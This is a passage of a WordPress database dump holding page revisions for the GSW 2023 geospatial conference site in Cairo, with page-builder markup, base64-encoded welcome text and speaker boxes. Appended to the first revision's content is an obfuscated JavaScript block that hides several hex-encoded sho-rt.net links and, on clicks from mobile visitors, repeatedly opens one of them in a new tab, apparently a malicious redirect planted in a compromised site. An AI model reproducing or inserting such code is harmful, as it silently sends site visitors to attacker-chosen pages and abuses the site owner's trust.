mb3IlMjBuYXRpb25zJTI3JTIwcHJvZ3Jlc3MlMjBhbmQlMjBwcm9zcGVyaXR5LiUyMEl0JTIwaXMlMjB0aGUlMjBwcmltYXJ5JTIwZmFjdG9yJTIwZm9yJTIwaHVtYW4lMjBhY2hpZXZlbWVudHMlMjB0aHJvdWdob3V0JTIwYWxsJTIwYWdlcy4lMjBBQVNUTVQlMjBoYXMlMjBhJTIwaG9zdCUyMG9mJTIwcXVhbGlmaWVkJTIwcHJvZmVzc29ycyUyMGFuZCUyMGV4cGVydHMlMjB3aG8lMjBhcmUlMjBjYXBhYmxlJTIwb2YlMjBzdXBwb3J0aW5nJTIwQXJhYiUyMGFuZCUyMEFmcmljYW4lMjBjb3VudHJpZXMlMjBpbiUyMHZhcmlvdXMlMjBzY2llbnRpZmljJTIwZmllbGRzLiUyMFRoZSUyMEdTVyUyMHdpbGwlMjBwcm92aWRlJTIwYSUyMHBsYXRmb3JtJTIwZm9yJTIwaW50ZXJuYXRpb25hbCUyMHNjaG9sYXJzJTJDJTIwZ3JhZHVhdGUlMjBzdHVkZW50cyUyQyUyMGZ1dHVyZSUyMHNjaWVudGlzdHMlMjBhbmQlMjBpbmR1c3RyaWFsJTIwc2VjdG9ycyUyMHRvJTIwbGVhcm4lMjBleGNoYW5nZSUyMGtub3dsZWRnZSUyMGFuZCUyMGV4cGVyaWVuY2VzJTIwb2YlMjBhcHBseWluZyUyMGdlb3NwYXRpYWwlMjB0ZWNobm9sb2dpZXMlMjBmb3IlMjBzdXN0YWluYWJsZSUyMGRldmVsb3BtZW50JTIwZm9yJTIwYmV0dGVyJTIwcXVhbGl0eSUyMG9mJTIwbGlmZSUyMGZvciUyMHBlb3BsZSUyMGFyb3VuZCUyMHRoZSUyMHdvcmxkLiUyMFdlJTIwd291bGQlMjBsaWtlJTIwdG8lMjB0YWtlJTIwdGhpcyUyMG9wcG9ydHVuaXR5JTIwdG8lMjB3ZWxjb21lJTIweW91JTIwdG8lMjBDYWlybyUyMGElMjB2aWJyYW50JTJDJTIwZXhoaWxhcmF0aW5nJTJDJTIwZXhvdGljJTJDJTIwZmFzY2luYXRpbmclMjBhbmQlMjB3ZWxjb21pbmclMjBjaXR5LiUyMEhvbWUlMjB0byUyMHRoZSUyMGJlc3QlMjBQaGFyYW9uaWMlMkMlMjBDb3B0aWMlMjBhbmQlMjBJc2xhbWljJTIwc2lnaHRzJTIwaW4lMjBFZ3lwdC4lMjBDYWlybyUyMGlzJTIwd2hlcmUlMjB5b3UlMjBuZXZlciUyMGtub3clMjB3aGF0JTIwaW5jcmVkaWJsZSUyQyUyMGhhbGYtZm9yZ290dGVuJTIwbW9udW1lbnQlMjB5b3UlMjBtaWdodCUyMHN0dW1ibGUlMjBhY3Jvc3MlMjB3aGlsZSUyMHdhbmRlcmluZyUyMGFyb3VuZC4lMjBFbmpveSUyMHRoZSUyME5pbGUlMjB2aWV3JTJDJTIwdmlzaXQlMjB0aGUlMjBncmVhdCUyMHB5cmFtaWRzJTIwb2YlMjBHaXphJTJDJTIwd2FsayUyMHRocm91Z2glMjB0aGUlMjBjYXBpdGFsJTI3cyUyMG1lZGlldmFsJTIwbWFya2V0cyUyMGJ5JTIwS2hhbiUyMEVsLUtoYWxpbGklMkMlMjBvciUyMHdhbGslMjBkb3duJTIwdGhlJTIwTmlsZSUyMHByb21lbmFkZS4lMjBXZSUyMGxvb2slMjBmb3J3YXJkJTIwdG8lMjB3b3JraW5nJTIwd2l0aCUyMHRoZSUyMElTUFJTJTIwY291bmNpbCUyQyUyMGNvbW1pc3Npb25zJTIwcHJlc2lkZW50cyUyQyUyMHdvcmtpbmclMjBncm91cCUyMG9mZmljZXJzJTJDJTIwYW5kJTIwb3RoZXIlMjBzaXN0ZXIlMjBvcmdhbml6YXRpb25zJTIwdG8lMjBoYXZlJTIwYSUyMHN1Y2Nlc3NmdWwlMjB0ZWNobmljYWwlMjBwcm9ncmFtJTIwYW5kJTIwYSUyMG1lbW9yYWJsZSUyMHNvY2lhbCUyMHByb2dyYW0uJTIwSXQlMjBpcyUyMGdyZWF0JTIwdG8lMjBoYXZlJTIwdGhlJTIwR1NXJTIwY29taW5nJTIwdG8lMjBFZ3lwdCUyMHdoZXJlJTIwbW9zdCUyMHByb2JhYmx5JTIwdGhlJTIwZmlyc3QlMjBtYXBwaW5nJTIwc3lzdGVtcyUyMHdlcmUlMjBkZXZlbG9wZWQlMjAxMDAwcyUyMHllYXJzJTIwYWdvLiUyMFdlbGNvbWUlMjB0byUyMEdTVyUyNzIwMjMlMjBpbiUyMENhaXJvJTJDJTIwRWd5cHQuJTNDJTJGcCUzRQ==[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"``The time is always right to do what is right!``\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"Have a project you\'d like to talk about?\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Sed consequat erat vitae odio placerat, vel malesuada mi convallis we can help![/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527107907{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]VIEW SHOWCASE[/dt_default_button][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-05 18:08:56','2022-10-05 18:08:56','',2167,'https://gsw2023.com/?p=2302',0,'revision','',0),
(2303,1,'2022-10-05 18:09:21','2022-10-05 18:09:21','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\" margin_design_tab_text=\"\"][/ultimate_heading][vc_row_inner][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjIlMjBzdHlsZSUzRCUyMmNvbG9yJTNBYmxhY2slM0IlMjIlM0VBcyUyMHdlJTIwY2VsZWJyYXRlJTIwb3VyJTIwNTB0aCUyMGFubml2ZXJzYXJ5JTJDJTIwdGhlJTIwQXJhYiUyMEFjYWRlbXklMjBmb3IlMjBTY2llbmNlJTJDJTIwVGVjaG5vbG9neSUyQyUyMGFuZCUyME1hcml0aW1lJTIwVHJhbnNwb3J0JTIwJTI4QUFTVE1UJTI5JTIwaXMlMjBob25vcmVkJTIwdG8lMjBob3N0JTIwdGhlJTIwSVNQUlMlMjBmaXJzdCUyMEdlb3NwYXRpYWwlMjBXZWVrJTIwaW4lMjBBZnJpY2ElMjBhbmQlMjBNaWRkbGUlMjBFYXN0JTIwaW4lMjAyMDIzJTIwJTI4R1NXLTIwMjMlMjklMjB0aGF0JTIwd2lsbCUyMGJlJTIwaGVsZCUyMHVuZGVyJTIwdGhlJTIwYXVzcGljZXMlMjBvZiUyMEguRSUyMFNlY3JldGFyeS1HZW5lcmFsJTIwb2YlMjB0aGUlMjBMZWFndWUlMjBvZiUyMEFyYWIlMjBTdGF0ZXMuJTIwVGhlJTIwY29uZmVyZW5jZSUyMHdpbGwlMjBiZSUyMGhlbGQlMjBpbiUyMFNlcHRlbWJlciUyMDIwMjMlMkMlMjBhdCUyMHRoZSUyMEludGVyQ29udGluZW50YWwlMjBDYWlybyUyMENpdHklMjBzdGFycyUyMENhaXJvJTJDJTIwRWd5cHQuJTIwQUFTVE1UJTIwc3Ryb25nbHklMjBiZWxpZXZlcyUyMHRoYXQlMjBzY2llbmNlJTIwaXMlMjB0aGUlMjBrZXklMjB0byUyMHRoZSUyMGZ1dHVyZSUyMGFuZCUyMHRoZSUyMGNvcm5lcnN0b25lJTIwZm9yJTIwbmF0aW9ucyUyNyUyMHByb2dyZXNzJTIwYW5kJTIwcHJvc3Blcml0eS4lMjBJdCUyMGlzJTIwdGhlJTIwcHJpbWFyeSUyMGZhY3RvciUyMGZvciUyMGh1bWFuJTIwYWNoaWV2ZW1lbnRzJTIwdGhyb3VnaG91dCUyMGFsbCUyMGFnZXMuJTIwQUFTVE1UJTIwaGFzJTIwYSUyMGhvc3QlMjBvZiUyMHF1YWxpZmllZCUyMHByb2Zlc3NvcnMlMjBhbmQlMjBleHBlcnRzJTIwd2hvJTIwYXJlJTIwY2FwYWJsZSUyMG9mJTIwc3VwcG9ydGluZyUyMEFyYWIlMjBhbmQlMjBBZnJpY2FuJTIwY291bnRyaWVzJTIwaW4lMjB2YXJpb3VzJTIwc2NpZW50aWZpYyUyMGZpZWxkcy4lMjBUaGUlMjBHU1clMjB3aWxsJTIwcHJvdmlkZSUyMGElMjBwbGF0Zm9ybSUyMGZvciUyMGludGVybmF0aW9uYWwlMjBzY2hvbGFycyUyQyUyMGdyYWR1YXRlJTIwc3R1ZGVudHMlMkMlMjBmdXR1cmUlMjBzY2llbnRpc3RzJTIwYW5kJTIwaW5kdXN0cmlhbCUyMHNlY3RvcnMlMjB0byUyMGxlYXJuJTIwZXhjaGFuZ2UlMjBrbm93bGVkZ2UlMjBhbmQlMjBleHBlcmllbmNlcyUyMG9mJTIwYXBwbHlpbmclMjBnZW9zcGF0aWFsJTIwdGVjaG5vbG9naWVzJTIwZm9yJTIwc3VzdGFpbmFibGUlMjBkZXZlbG9wbWVudCUyMGZvciUyMGJldHRlciUyMHF1YWxpdHklMjBvZiUyMGxpZmUlMjBmb3IlMjBwZW9wbGUlMjBhcm91bmQlMjB0aGUlMjB3b3JsZC4lMjBXZSUyMHdvdWxkJTIwbGlrZSUyMHRvJTIwdGFrZSUyMHRoaXMlMjBvcHBvcnR1bml0eSUyMHRvJTIwd2VsY29tZSUyMHlvdSUyMHRvJTIwQ2Fpcm8lMjBhJTIwdmlicmFudCUyQyUyMGV4aGlsYXJhdGluZyUyQyUyMGV4b3RpYyUyQyUyMGZhc2NpbmF0aW5nJTIwYW5kJTIwd2VsY29taW5nJTIwY2l0eS4lMjBIb21lJTIwdG8lMjB0aGUlMjBiZXN0JTIwUGhhcmFvbmljJTJDJTIwQ29wdGljJTIwYW5kJTIwSXNsYW1pYyUyMHNpZ2h0cyUyMGluJTIwRWd5cHQuJTIwQ2Fpcm8lMjBpcyUyMHdoZXJlJTIweW91JTIwbmV2ZXIlMjBrbm93JTIwd2hhdCUyMGluY3JlZGlibGUlMkMlMjBoYWxmLWZvcmdvdHRlbiUyMG1vbnVtZW50JTIweW91JTIwbWlnaHQlMjBzdHVtYmxlJTIwYWNyb3NzJTIwd2hpbGUlMjB3YW5kZXJpbmclMjBhcm91bmQuJTIwRW5qb3klMjB0aGUlMjBOaWxlJTIwdmlldyUyQyUyMHZpc2l0JTIwdGhlJTIwZ3JlYXQlMjBweXJhbWlkcyUyMG9mJTIwR2l6YSUyQyUyMHdhbGslMjB0aHJvdWdoJTIwdGhlJTIwY2FwaXRhbCUyN3MlMjBtZWRpZXZhbCUyMG1hcmtldHMlMjBieSUyMEtoYW4lMjBFbC1LaGFsaWxpJTJDJTIwb3IlMjB3YWxrJTIwZG93biUyMHRoZSUyME5pbGUlMjBwcm9tZW5hZGUuJTIwV2UlMjBsb29rJTIwZm9yd2FyZCUyMHRvJTIwd29ya2luZyUyMHdpdGglMjB0aGUlMjBJU1BSUyUyMGNvdW5jaWwlMkMlMjBjb21taXNzaW9ucyUyMHByZXNpZGVudHMlMkMlMjB3b3JraW5nJTIwZ3JvdXAlMjBvZmZpY2VycyUyQyUyMGFuZCUyMG90aGVyJTIwc2lzdGVyJTIwb3JnYW5pemF0aW9ucyUyMHRvJTIwaGF2ZSUyMGElMjBzdWNjZXNzZnVsJTIwdGVjaG5pY2FsJTIwcHJvZ3JhbSUyMGFuZCUyMGElMjBtZW1vcmFibGUlMjBzb2NpYWwlMjBwcm9ncmFtLiUyMEl0JTIwaXMlMjBncmVhdCUyMHRvJTIwaGF2ZSUyMHRoZSUyMEdTVyUyMGNvbWluZyUyMHRvJTIwRWd5cHQlMjB3aGVyZSUyMG1vc3QlMjBwcm9iYWJseSUyMHRoZSUyMGZpcnN0JTIwbWFwcGluZyUyMHN5c3RlbXMlMjB3ZXJlJTIwZGV2ZWxvcGVkJTIwMTAwMHMlMjB5ZWFycyUyMGFnby4lMjBXZWxjb21lJTIwdG8lMjBHU1clMjcyMDIzJTIwaW4lMjBDYWlybyUyQyUyMEVneXB0LiUzQyUyRnAlM0U=[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 